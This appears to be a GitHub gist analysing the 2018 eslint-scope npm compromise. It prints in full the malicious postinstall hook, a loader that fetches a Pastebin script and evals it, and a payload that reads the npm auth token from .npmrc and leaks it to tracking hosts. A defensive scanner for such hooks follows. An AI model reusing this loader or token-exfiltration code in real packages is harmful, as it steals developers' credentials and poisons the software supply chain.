@Gerst20051
Forked from hzoo/build.js
Created October 21, 2018 00:34
eslint-scope attack

The attacker modified package.json in both [email protected] and [email protected], adding a postinstall script to run build.js.

{
+ "postinstall": "node ./lib/build.js",
}

build.js

This script downloads another script from Pastebin and evals its contents.

Some people have reported that this code has an issue:

r.on("data", c => {
  eval(c);
});

Because it doesn't wait for the request to complete, the request can deliver only part of the script, and the eval call then fails with a SyntaxError; this is how the issue was discovered.

pastebin (https://pastebin.com/XLeVP82h, taken down)

The script extracts the _authToken from a user's .npmrc and sends it to histats and statcounter inside the Referer header.

// build.js: first stage, fetches the second stage from Pastebin and evals each chunk as it arrives
try {
  var https = require("https");
  https
    .get(
      {
        hostname: "pastebin.com",
        path: "/raw/XLeVP82h",
        headers: {
          "User-Agent":
            "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
          Accept:
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        }
      },
      r => {
        r.setEncoding("utf8");
        r.on("data", c => {
          eval(c);
        });
        r.on("error", () => {});
      }
    )
    .on("error", () => {});
} catch (e) {}

// pastebin payload: second stage, reads the npm _authToken from ~/.npmrc and leaks it in the Referer header
try {
  var path = require("path");
  var fs = require("fs");
  var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, ".npmrc");
  var content = "nofile";
  if (fs.existsSync(npmrc)) {
    content = fs.readFileSync(npmrc, { encoding: "utf8" });
    content = content.replace("//registry.npmjs.org/:_authToken=", "").trim();
    var https1 = require("https");
    https1
      .get(
        {
          hostname: "sstatic1.histats.com",
          path: "/0.gif?4103075&101",
          method: "GET",
          headers: { Referer: "http://1.a/" + content }
        },
        () => {}
      )
      .on("error", () => {});
    https1
      .get(
        {
          hostname: "c.statcounter.com",
          path: "/11760461/0/7b5b9d71/1/",
          method: "GET",
          headers: { Referer: "http://2.b/" + content }
        },
        () => {}
      )
      .on("error", () => {});
  }
} catch (e) {}
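As an added defensive check (not part of the original gist), the script below flags the two ingredients the attack relied on: a lifecycle hook in package.json that executes at install time, and a hook script whose source fetches remote content and passes it to eval. The package name, version, and file contents in the sample are constructed; the regexes are heuristics, not a complete detector.

```javascript
// Added defensive check (not from the original gist): flag install-time hooks
// and hook scripts that fetch remote content and hand it to eval.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// List every lifecycle hook declared in a package.json text with its command.
function findInstallHooks(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return LIFECYCLE_HOOKS.filter(h => typeof scripts[h] === "string")
    .map(h => ({ hook: h, command: scripts[h] }));
}

// Heuristic source scan: returns the names of the indicators present in a script body.
function scanScriptSource(src) {
  const checks = {
    "dynamic-eval": /\beval\s*\(|\bnew\s+Function\s*\(/,
    "network-fetch": /\brequire\(\s*["']https?["']\s*\)|\bhttps?\s*\.\s*get\s*\(/,
    "reads-npmrc": /\.npmrc\b/,
    "auth-token": /_authToken/
  };
  return Object.keys(checks).filter(name => checks[name].test(src));
}

// Correlate: for each hook that runs "node <file>", scan that file's source.
// fileContents maps package-relative paths (e.g. "lib/build.js") to text.
function assessPackage(packageJsonText, fileContents) {
  return findInstallHooks(packageJsonText).map(({ hook, command }) => {
    const m = /\bnode\s+(\S+)/.exec(command);
    const script = m ? m[1].replace(/^\.\//, "") : null;
    const src = script ? fileContents[script] : undefined;
    const indicators = src ? scanScriptSource(src) : [];
    // Fetch-plus-eval in an install hook is the loader pattern worth escalating.
    const suspicious = indicators.includes("dynamic-eval") && indicators.includes("network-fetch");
    return { hook, command, script, indicators, suspicious };
  });
}

// Constructed sample input modelled on the pattern above (not the real package).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-pkg", version: "0.0.1",
  scripts: { postinstall: "node ./lib/build.js" }
});
const SAMPLE_FILES = {
  "lib/build.js": [
    'var https = require("https");',
    'https.get({ hostname: "paste.example.invalid", path: "/raw/x" }, r => {',
    '  r.on("data", c => { eval(c); });',
    "});"
  ].join("\n")
};
console.log(JSON.stringify(assessPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

Run it against an unpacked tarball before publishing or installing; installing with `npm install --ignore-scripts` stops lifecycle hooks from running at all while you review.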